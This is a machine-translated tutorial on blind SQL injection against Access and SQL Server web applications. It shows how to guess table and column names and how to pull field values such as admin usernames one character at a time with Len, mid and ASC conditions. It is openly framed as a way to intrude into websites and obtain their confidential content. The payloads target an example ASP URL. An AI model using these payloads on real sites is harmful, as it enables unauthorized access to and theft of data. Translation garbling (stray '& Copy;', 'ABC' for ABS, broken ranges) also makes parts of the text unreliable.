SQL Injection Attack Trilogy

 

In this article, we learned how to judge SQL injection, but it is far from enough to obtain the website's confidential content. Next, we will continue to learn how to obtain the desired content from the database.

 

Through the introduction, we know how to judge SQL injection attacks. However, if you want to intrude into the website and obtain confidential content of the website, you will not be able to achieve this through the introduction. This article further analyzes SQL injection attacks.

First, let's take a look at the general steps of SQL injection:

Section 1: General steps of SQL Injection

First, judge the environment, find the injection point, and determine the database type. This is already discussed in the Getting Started article.

Secondly, according to the injection parameter type, the original appearance of the SQL statement is reconstructed in mind. There are three types of parameters:

(A) id = 49 These injection parameters are numeric. The SQL statement is roughly as follows:

Select * from table name where field = 49

The injected parameter is id = 49 and [query condition], that is, the generated statement:

Select * from table name where field = 49 and [query condition]

(B) Class = the injection parameters of the series are simplified. The SQL statements are roughly as follows:

Select * from table name where field = 'series'

The injected parameters are class = series and [query conditions] And ''= ', that is, the generated statement:

Select * from table name where field = 'series' and [query conditions] And ''=''

& Copy; parameters are not filtered during search, such as keyword = keyword. The SQL statement is roughly as follows:

Select * from table name where field like '% keyword %'

The injected parameter is keyword = 'and [query condition] And' % 25' = ', which is the generated statement:

Select * from table name where field like '%' and [query condition] And '%' = '%'

Then, replace the query condition with an SQL statement to guess the table name, for example:

Id = 49 and (select count (*) from Admin)> = 0

If the page is the same as that of ID = 49, the additional conditions are true, that is, the table admin exists, and vice versa (Please remember this method ). This loop ends until the table name is guessed.

After the table name is guessed, replace count (*) with Count (field name) and use the same principle to guess the field name.

Some people may say: there are some occasional elements. If the table name is complex and irregular, it won't be enough. That's right. There is no 100% successful hacker technology in this world. No matter how technical or advanced hackers are, this is because other people's programs are not strictly written or the user's security awareness is not enough.

I am a little confused. After all, there is still a way for the SQL Server database to let the program tell us the table name and field name. We will introduce it in the advanced article.

Finally, after the table name and column name are successfully guessed, use an SQL statement to obtain the field value. The following describes the most common method-ASCII verbatim decoding, although this method is slow, it must be a feasible method.

For example, we know that the username field exists in the admin table. First, we take the first record and test the length:

Http://www.mytest.com/showdetail.asp? Id = 49; and (select top 1 Len (username) from Admin)> 0

First, describe the principle: if the length of top 1's username is greater than 0, then the condition is true; then, the test goes on like> 1,> 2,> 3 until the condition is not true, for example, if 7 is true or 8 is not true, It means Len (username) = 8.

Of course, no one will be stupid from 0, 1, 2, 3 tests one by one, so how can we get started quickly. After obtaining the length of username, use mid (username, N, 1) to intercept the nth character, and then ASC (mid (username, N, 1) to obtain the ASCII code, for example:

Id = 49 and (select top 1 ASC (mid (username, 1, 1) from Admin)> 0

The ASCII code of 1st characters is also obtained by gradually narrowing down the range. Note that the ASCII code of English and numbers is between 1-characters and can be accelerated by the half-fold method, if the program is written for testing, the efficiency will be greatly improved.

Section 2 SQL Injection common functions

Those who have basic SQL language have a much higher success rate than those who are not familiar with SQL injection. We need to improve our SQL level, especially some common functions and commands.

Access: ASC (character) sqlserver: Unicode (character)

Purpose: return the ASCII code of a character.

Access: CHR (number) sqlserver: nchar (number)

Function: opposite to ASC, returns Characters Based on the ASCII code.

Access: Mid (string, n, l) sqlserver: substring (string, N, L)

Purpose: return the substring of the string that starts from n characters and ranges from N to N + L.

Access: ABC (number) sqlserver: ABC (number)

Purpose: return the absolute value of a number (used to guess Chinese characters)

Access: A between B and C sqlserver: A between B and C

Purpose: Determine whether a is between B and C.

Section 3. Chinese Processing Methods

It is common to encounter Chinese characters during injection. Some people may want to retreat when they encounter Chinese characters. In fact, as long as you have some knowledge about Chinese encoding, "Chinese phobias" can be quickly overcome.

First, let's talk about common sense:

In access, the Chinese ASCII code may have a negative number. After this negative number is obtained, use ABS () to obtain the absolute value. The Chinese characters remain unchanged.

In SQL Server, Chinese ASCII is a positive number. However, because it is a unicode double-bit encoding, the ASCII Code cannot be obtained using the function ASCII (). The Unicode value must be returned using the function Unicode, use the nchar function to obtain the corresponding Chinese characters.

After learning about the above two points, Do you think Chinese Guesses are actually similar to English? Except for the functions used, you must note that the scope of the solution is larger, and the method is similar.